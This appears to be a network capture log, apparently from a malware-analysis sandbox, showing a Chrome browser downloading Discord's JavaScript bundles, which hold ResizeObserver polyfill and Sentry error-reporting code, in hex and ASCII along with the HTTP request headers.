                                                                          2023-12-10 16:45:10 UTC401INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 34 39 39 39 22 5d 2c 7b 35 30 33 32 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 44 4f 4d 52 65 63 74 52 65 61 64 4f 6e 6c 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 4f 4d 52 65 63 74 52 65 61 64 4f 6e 6c 79 7d 7d 29 2c 6e 28 22 32 37 34 36 33 35 22 29 3b 76 61 72 20 44 4f 4d 52 65 63 74 52 65 61 64 4f 6e 6c 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 44 4f 4d 52 65 63 74 52 65 61 64 4f 6e 6c 79 28 74 2c 65 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["64999"],{50323:function(t,e,n){"use strict";n.r(e),n.d(e,{DOMRectReadOnly:function(){return DOMRectReadOnly}}),n("274635");var DOMRectReadOnly=function(){function DOMRectReadOnly(t,e,
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 69 73 2e 77 69 64 74 68 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 74 68 69 73 29 7d 72 65 74 75 72 6e 20 44 4f 4d 52 65 63 74 52 65 61 64 4f 6e 6c 79 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 78 3a 74 68 69 73 2e 78 2c 79 3a 74 68 69 73 2e 79 2c 74 6f 70 3a 74 68 69 73 2e 74 6f 70 2c 72 69 67 68 74 3a 74 68 69 73 2e 72 69 67 68 74 2c 62 6f 74 74 6f 6d 3a 74 68 69 73 2e 62 6f 74 74 6f 6d 2c 6c 65 66 74 3a 74 68 69 73 2e 6c 65 66 74 2c 77 69 64 74 68 3a 74 68 69 73 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 74 68 69 73 2e 68 65 69 67 68 74 7d 7d 2c 44 4f 4d 52 65 63 74 52 65 61 64 4f 6e 6c 79 2e 66 72 6f 6d 52 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20
                                                                          Data Ascii: is.width,Object.freeze(this)}return DOMRectReadOnly.prototype.toJSON=function(){return{x:this.x,y:this.y,top:this.top,right:this.right,bottom:this.bottom,left:this.left,width:this.width,height:this.height}},DOMRectReadOnly.fromRect=function(t){return new
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 61 6d 65 74 65 72 20 31 20 69 73 20 6e 6f 74 20 61 20 66 75 6e 63 74 69 6f 6e 2e 22 29 3b 72 2e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 43 6f 6e 74 72 6f 6c 6c 65 72 2e 63 6f 6e 6e 65 63 74 28 74 68 69 73 2c 74 29 7d 72 65 74 75 72 6e 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 62 73 65 72 76 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 30 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 61 69 6c 65 64 20 74 6f 20 65 78 65 63 75 74 65 20 27 6f 62 73 65 72 76 65 27 20 6f 6e 20 27 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 27 3a 20 31 20 61 72 67 75 6d 65 6e 74 20 72 65 71 75 69 72 65 64 2c 20 62 75 74 20 6f 6e 6c 79 20 30 20 70 72 65 73 65 6e 74
                                                                          Data Ascii: ameter 1 is not a function.");r.ResizeObserverController.connect(this,t)}return ResizeObserver.prototype.observe=function(t,e){if(0==arguments.length)throw TypeError("Failed to execute 'observe' on 'ResizeObserver': 1 argument required, but only 0 present
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 2c 6f 3d 6e 28 22 31 33 36 35 32 32 22 29 2c 61 3d 6e 28 22 32 33 34 36 34 33 22 29 2c 75 3d 6e 65 77 20 4d 61 70 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 3d 31 29 69 66 28 74 5b 6e 5d 2e 74 61 72 67 65 74 3d 3d 3d 65 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 20 2d 31 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 6f 6e 6e 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 6f 2e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 44 65 74 61 69 6c 28 74 2c 65 29 3b 61 2e 72 65 73 69 7a 65 4f 62 73 65 72 76 65 72 73 2e 70 75 73 68 28 6e 29 2c 75 2e 73 65 74 28 74 2c 6e 29 7d
                                                                          Data Ascii: ,o=n("136522"),a=n("234643"),u=new Map,s=function(t,e){for(var n=0;n<t.length;n+=1)if(t[n].target===e)return n;return -1},c=function(){function t(){}return t.connect=function(t,e){var n=new o.ResizeObserverDetail(t,e);a.resizeObservers.push(n),u.set(t,n)}
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 5d 7d 7d 2c 31 33 36 38 31 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 62 72 6f 61 64 63 61 73 74 41 63 74 69 76 65 4f 62 73 65 72 76 61 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 2c 6e 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 72 3d 6e 28 22 32 33 34 36 34 33 22 29 2c 69 3d 6e 28 22 39 30 34 33 35 32 22 29 2c 6f 3d 6e 28 22 34 31 38 36 39 34 22 29 2c 61 3d 6e 28 22 31 37 30 36 30 31 22 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 31 2f 30 2c 65 3d 5b 5d 3b 72 2e 72 65 73 69 7a 65 4f 62 73 65 72 76 65 72 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 30 21 3d 3d 6e 2e 61 63 74
                                                                          Data Ascii: ]}},136810:function(t,e,n){"use strict";n.r(e),n.d(e,{broadcastActiveObservations:function(){return u}}),n("424973");var r=n("234643"),i=n("904352"),o=n("418694"),a=n("170601"),u=function(){var t=1/0,e=[];r.resizeObservers.forEach(function(n){if(0!==n.act
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 72 65 74 75 72 6e 20 75 2e 73 65 74 28 74 2c 70 29 2c 70 3b 76 61 72 20 65 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 29 2c 6e 3d 28 30 2c 6f 2e 69 73 53 56 47 29 28 74 29 26 26 74 2e 6f 77 6e 65 72 53 56 47 45 6c 65 6d 65 6e 74 26 26 74 2e 67 65 74 42 42 6f 78 28 29 2c 72 3d 21 6c 26 26 22 62 6f 72 64 65 72 2d 62 6f 78 22 3d 3d 3d 65 2e 62 6f 78 53 69 7a 69 6e 67 2c 61 3d 63 2e 74 65 73 74 28 65 2e 77 72 69 74 69 6e 67 4d 6f 64 65 7c 7c 22 22 29 2c 64 3d 21 6e 26 26 73 2e 74 65 73 74 28 65 2e 6f 76 65 72 66 6c 6f 77 59 7c 7c 22 22 29 2c 76 3d 21 6e 26 26 73 2e 74 65 73 74 28 65 2e 6f 76 65 72 66 6c 6f 77 58 7c 7c 22 22 29 2c 79 3d 6e 3f 30 3a 66 28 65 2e 70 61 64 64 69 6e 67 54 6f 70 29 2c 6d 3d 6e 3f 30 3a 66 28 65 2e 70 61 64 64 69 6e 67
                                                                          Data Ascii: return u.set(t,p),p;var e=getComputedStyle(t),n=(0,o.isSVG)(t)&&t.ownerSVGElement&&t.getBBox(),r=!l&&"border-box"===e.boxSizing,a=c.test(e.writingMode||""),d=!n&&s.test(e.overflowY||""),v=!n&&s.test(e.overflowX||""),y=n?0:f(e.paddingTop),m=n?0:f(e.padding
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 3d 22 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 20 6c 6f 6f 70 20 63 6f 6d 70 6c 65 74 65 64 20 77 69 74 68 20 75 6e 64 65 6c 69 76 65 72 65 64 20 6e 6f 74 69 66 69 63 61 74 69 6f 6e 73 2e 22 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 45 72 72 6f 72 45 76 65 6e 74 3f 74 3d 6e 65 77 20 45 72 72 6f 72 45 76 65 6e 74 28 22 65 72 72 6f 72 22 2c 7b 6d 65 73 73 61 67 65 3a 72 7d 29 3a 28 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 45 76 65 6e 74 22 29 29 2e 69 6e 69 74 45 76 65 6e 74 28 22 65 72 72 6f 72 22 2c 21 31 2c 21 31 29 2c 74 2e 6d 65 73 73 61 67 65 3d 72 29 2c 77 69 6e
                                                                          Data Ascii: unction(){return i}});var r="ResizeObserver loop completed with undelivered notifications.",i=function(){var t;"function"==typeof ErrorEvent?t=new ErrorEvent("error",{message:r}):((t=document.createEvent("Event")).initEvent("error",!1,!1),t.message=r),win
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 69 73 48 69 64 64 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 69 73 52 65 70 6c 61 63 65 64 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 56 47 45 6c 65 6d 65 6e 74 26 26 22 67 65 74 42 42 6f 78 22 69 6e 20 74 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 72 28 74 29 29 7b 76 61 72 20 65 3d 74 2e 67 65 74 42 42 6f 78 28 29 2c 6e 3d 65 2e 77 69 64 74 68 2c 69 3d 65 2e 68 65 69 67 68 74 3b 72 65 74 75 72 6e 21 6e 26 26 21 69 7d
                                                                          Data Ascii: (){return r},isHidden:function(){return i},isElement:function(){return o},isReplacedElement:function(){return a}});var r=function(t){return t instanceof SVGElement&&"getBBox"in t},i=function(t){if(r(t)){var e=t.getBBox(),n=e.width,i=e.height;return!n&&!i}
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 73 70 6c 69 63 65 28 30 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 28 29 7d 29 7d 29 2e 6f 62 73 65 72 76 65 28 6e 2c 7b 63 68 61 72 61 63 74 65 72 44 61 74 61 3a 21 30 7d 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 2b 28 65 3f 65 2d 2d 3a 65 2b 2b 29 7d 7d 69 2e 70 75 73 68 28 74 29 2c 72 28 29 7d 7d 2c 31 32 32 34 31 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 71 75 65 75 65 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 22 31 30 31 33 33
                                                                          Data Ascii: on(){return i.splice(0).forEach(function(t){return t()})}).observe(n,{characterData:!0}),r=function(){n.textContent=""+(e?e--:e++)}}i.push(t),r()}},122417:function(t,e,n){"use strict";n.r(e),n.d(e,{queueResizeObserver:function(){return i}});var r=n("10133


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          246192.168.2.549980162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC866OUTGET /assets/47470.c4ab7647d25b8ac58ca8.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=L2cdwzEiZXRsWVQDn5J7qG2EKtpfMxMPTt5WH8bmYfk-1702226710451-0-604800000
                                                                          2023-12-10 16:45:11 UTC1131INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 31 37 38 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 66 63 65 39 31 38 64 65 38 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:11 GMTContent-Type: application/javascriptContent-Length: 311789Connection: closeCF-Ray: 8336f4efce918de8-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:11 UTC238INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 37 34 37 30 22 5d 2c 7b 35 37 37 33 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 42 72 6f 77 73 65 72 43 6c 69 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 22 36 37 35 30 36 35 22 29 2c 69 3d 6e 28 22 31 30 33 37 38 37 22 29 2c 61 3d 6e 28 22 34 33 36 32 22 29 2c 73 3d 6e 28 22 37 31 34 30 39 30 22 29 2c 6f 3d 6e 28 22 35 38 35 39 37 32 22 29
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["47470"],{57738:function(t,e,n){"use strict";n.r(e),n.d(e,{BrowserClient:function(){return l}});var r=n("675065"),i=n("103787"),a=n("4362"),s=n("714090"),o=n("585972")
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 2c 63 3d 6e 28 22 31 33 30 31 37 38 22 29 3b 63 6c 61 73 73 20 6c 20 65 78 74 65 6e 64 73 20 72 2e 42 61 73 65 43 6c 69 65 6e 74 7b 65 76 65 6e 74 46 72 6f 6d 45 78 63 65 70 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 65 76 65 6e 74 46 72 6f 6d 45 78 63 65 70 74 69 6f 6e 29 28 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 73 74 61 63 6b 50 61 72 73 65 72 2c 74 2c 65 2c 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 61 74 74 61 63 68 53 74 61 63 6b 74 72 61 63 65 29 7d 65 76 65 6e 74 46 72 6f 6d 4d 65 73 73 61 67 65 28 74 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 69 6e 66 6f 22 2c 6e 3d 61 72 67 75
                                                                          Data Ascii: ,c=n("130178");class l extends r.BaseClient{eventFromException(t,e){return(0,a.eventFromException)(this._options.stackParser,t,e,this._options.attachStacktrace)}eventFromMessage(t){let e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"info",n=argu
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 65 6c 6f 70 65 29 28 74 2c 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 74 75 6e 6e 65 6c 26 26 28 30 2c 69 2e 64 73 6e 54 6f 53 74 72 69 6e 67 29 28 74 68 69 73 2e 5f 64 73 6e 29 29 3b 74 68 69 73 2e 5f 73 65 6e 64 45 6e 76 65 6c 6f 70 65 28 65 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 29 7b 6c 65 74 20 65 3d 73 2e 57 49 4e 44 4f 57 2e 53 45 4e 54 52 59 5f 53 44 4b 5f 53 4f 55 52 43 45 7c 7c 28 30 2c 69 2e 67 65 74 53 44 4b 53 6f 75 72 63 65 29 28 29 3b 74 2e 5f 6d 65 74 61 64 61 74 61 3d 74 2e 5f 6d 65 74 61 64 61 74 61 7c 7c 7b 7d 2c 74 2e 5f 6d 65 74 61 64 61 74 61 2e 73 64 6b 3d 74 2e 5f 6d 65 74 61 64 61 74 61 2e 73 64 6b 7c 7c 7b 6e 61 6d 65 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 62 72 6f 77 73 65 72 22 2c 70 61 63 6b 61 67 65
                                                                          Data Ascii: elope)(t,this._options.tunnel&&(0,i.dsnToString)(this._dsn));this._sendEnvelope(e)}constructor(t){let e=s.WINDOW.SENTRY_SDK_SOURCE||(0,i.getSDKSource)();t._metadata=t._metadata||{},t._metadata.sdk=t._metadata.sdk||{name:"sentry.javascript.browser",package
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 6e 20 6c 28 74 2c 65 2c 6e 2c 72 29 7b 6c 65 74 20 61 3d 6e 26 26 6e 2e 73 79 6e 74 68 65 74 69 63 45 78 63 65 70 74 69 6f 6e 7c 7c 76 6f 69 64 20 30 2c 73 3d 64 28 74 2c 65 2c 61 2c 72 29 3b 72 65 74 75 72 6e 28 30 2c 69 2e 61 64 64 45 78 63 65 70 74 69 6f 6e 4d 65 63 68 61 6e 69 73 6d 29 28 73 29 2c 73 2e 6c 65 76 65 6c 3d 22 65 72 72 6f 72 22 2c 6e 26 26 6e 2e 65 76 65 6e 74 5f 69 64 26 26 28 73 2e 65 76 65 6e 74 5f 69 64 3d 6e 2e 65 76 65 6e 74 5f 69 64 29 2c 28 30 2c 69 2e 72 65 73 6f 6c 76 65 64 53 79 6e 63 50 72 6f 6d 69 73 65 29 28 73 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65
                                                                          Data Ascii: n l(t,e,n,r){let a=n&&n.syntheticException||void 0,s=d(t,e,a,r);return(0,i.addExceptionMechanism)(s),s.level="error",n&&n.event_id&&(s.event_id=n.event_id),(0,i.resolvedSyncPromise)(s)}function u(t,e){let n=arguments.length>2&&void 0!==arguments[2]?argume
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 6e 63 61 74 28 74 2e 6d 65 73 73 61 67 65 2c 22 60 22 29 3b 69 66 28 28 30 2c 69 2e 69 73 45 76 65 6e 74 29 28 74 29 29 7b 6c 65 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 6c 65 74 20 65 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 65 3f 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 3a 76 6f 69 64 20 30 7d 63 61 74 63 68 28 74 29 7b 7d 7d 28 74 29 3b 72 65 74 75 72 6e 22 45 76 65 6e 74 20 60 22 2e 63 6f 6e 63 61 74 28 65 2c 22 60 20 28 74 79 70 65 3d 22 29 2e 63 6f 6e 63 61 74 28 74 2e 74 79 70 65 2c 22 29 20 63 61 70 74 75 72 65 64 20 61 73 20 22 29 2e 63 6f 6e 63 61 74 28 61 29 7d 72 65 74 75 72 6e 22 4f 62 6a 65 63 74 20 63 61 70 74 75 72 65 64 20 61 73 20 22 2e 63 6f 6e 63
                                                                          Data Ascii: ncat(t.message,"`");if((0,i.isEvent)(t)){let e=function(t){try{let e=Object.getPrototypeOf(t);return e?e.constructor.name:void 0}catch(t){}}(t);return"Event `".concat(e,"` (type=").concat(t.type,") captured as ").concat(a)}return"Object captured as ".conc
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 69 74 68 53 63 6f 70 65 29 28 65 3d 3e 7b 65 2e 61 64 64 45 76 65 6e 74 50 72 6f 63 65 73 73 6f 72 28 74 3d 3e 28 6e 2e 6d 65 63 68 61 6e 69 73 6d 26 26 28 28 30 2c 69 2e 61 64 64 45 78 63 65 70 74 69 6f 6e 54 79 70 65 56 61 6c 75 65 29 28 74 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 29 2c 28 30 2c 69 2e 61 64 64 45 78 63 65 70 74 69 6f 6e 4d 65 63 68 61 6e 69 73 6d 29 28 74 2c 6e 2e 6d 65 63 68 61 6e 69 73 6d 29 29 2c 74 2e 65 78 74 72 61 3d 7b 2e 2e 2e 74 2e 65 78 74 72 61 2c 61 72 67 75 6d 65 6e 74 73 3a 6f 7d 2c 74 29 29 2c 28 30 2c 72 2e 63 61 70 74 75 72 65 45 78 63 65 70 74 69 6f 6e 29 28 74 29 7d 29 2c 74 7d 7d 3b 74 72 79 7b 66 6f 72 28 6c 65 74 20 74 20 69 6e 20 65 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f
                                                                          Data Ascii: ithScope)(e=>{e.addEventProcessor(t=>(n.mechanism&&((0,i.addExceptionTypeValue)(t,void 0,void 0),(0,i.addExceptionMechanism)(t,n.mechanism)),t.extra={...t.extra,arguments:o},t)),(0,r.captureException)(t)}),t}};try{for(let t in e)Object.prototype.hasOwnPro
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 72 65 6e 74 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 65 78 74 72 61 63 74 54 72 61 63 65 70 61 72 65 6e 74 44 61 74 61 7d 2c 67 65 74 41 63 74 69 76 65 54 72 61 6e 73 61 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 67 65 74 41 63 74 69 76 65 54 72 61 6e 73 61 63 74 69 6f 6e 7d 2c 67 65 74 43 75 72 72 65 6e 74 48 75 62 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 67 65 74 43 75 72 72 65 6e 74 48 75 62 7d 2c 67 65 74 48 75 62 46 72 6f 6d 43 61 72 72 69 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 67 65 74 48 75 62 46 72 6f 6d 43 61 72 72 69 65 72 7d 2c 6d 61 6b 65 4d 61 69 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 6d 61 6b 65
                                                                          Data Ascii: rentData:function(){return r.extractTraceparentData},getActiveTransaction:function(){return r.getActiveTransaction},getCurrentHub:function(){return r.getCurrentHub},getHubFromCarrier:function(){return r.getHubFromCarrier},makeMain:function(){return r.make
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 77 69 6e 6a 73 53 74 61 63 6b 4c 69 6e 65 50 61 72 73 65 72 7d 2c 65 76 65 6e 74 46 72 6f 6d 45 78 63 65 70 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 65 76 65 6e 74 46 72 6f 6d 45 78 63 65 70 74 69 6f 6e 7d 2c 65 76 65 6e 74 46 72 6f 6d 4d 65 73 73 61 67 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 65 76 65 6e 74 46 72 6f 6d 4d 65 73 73 61 67 65 7d 2c 63 72 65 61 74 65 55 73 65 72 46 65 65 64 62 61 63 6b 45 6e 76 65 6c 6f 70 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 2e 63 72 65 61 74 65 55 73 65 72 46 65 65 64 62 61 63 6b 45 6e 76 65 6c 6f 70 65 7d 2c 63 61 70 74 75 72 65 55 73 65 72 46 65 65 64 62 61 63 6b 3a 66 75 6e 63
                                                                          Data Ascii: function(){return c.winjsStackLineParser},eventFromException:function(){return l.eventFromException},eventFromMessage:function(){return l.eventFromMessage},createUserFeedbackEnvelope:function(){return u.createUserFeedbackEnvelope},captureUserFeedback:func
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 74 74 70 43 6f 6e 74 65 78 74 7d 2c 44 65 64 75 70 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 2e 44 65 64 75 70 65 7d 2c 49 6e 74 65 67 72 61 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 22 36 37 35 30 36 35 22 29 2c 69 3d 6e 28 22 37 31 34 30 39 30 22 29 2c 61 3d 6e 28 22 35 37 37 33 38 22 29 2c 73 3d 6e 28 22 31 36 31 31 33 22 29 2c 6f 3d 6e 28 22 39 39 38 32 31 31 22 29 2c 63 3d 6e 28 22 32 33 35 34 31 30 22 29 2c 6c 3d 6e 28 22 34 33 36 32 22 29 2c 75 3d 6e 28 22 31 33 30 31 37 38 22 29 2c 64 3d 6e 28 22 38 33 37 38 30 38 22 29 2c 68 3d 6e 28 22 36 39 37 36 33 37 22 29 2c 66 3d 6e 28 22 33 32 31 37 39 38 22 29 2c 70 3d 6e 28 22 35 33 30 32 37 31 22 29 2c 5f 3d 6e 28
